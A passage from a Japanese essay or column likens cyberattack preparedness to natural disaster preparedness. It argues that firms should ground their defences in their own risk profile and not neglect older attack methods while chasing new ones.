同じことが、サイバー攻撃への備えにもいえるのではないだろうか。過去のインシデントや事故に学び、自社のリスクを知り、情報を収集し、いざというときに備えて対策や対応体制、手順を整えることで、被害を最小限に抑えてビジネスを継続することができるだろう。

ただ、自然災害にもさまざまな種類があるように、サイバー攻撃といってもいろいろな手法がある。しかもそれらが重なりつつ、半年~数年といったペースで主流の攻撃手法、注目される攻撃手法が入れ替わっていく。一方で、企業の持てる予算や人的リソースは有限だ。最新の情報に目を奪われてその対策にばかり注力していると、以前からあった攻撃手法に足をすくわれかねない。

「災害は忘れた頃にやってくる」といわれる。これだけ災害が多発すると、直前の災害の記憶によって過去の別の災害の教訓が上書きされ、風化してしまいがちだが、最新の情報は収集しつつもそれに過度におびえることなく、「自社にとって何がリスクか」を軸に冷静に向き合うことが重要ではないだろうか。

-2021/11/12追記-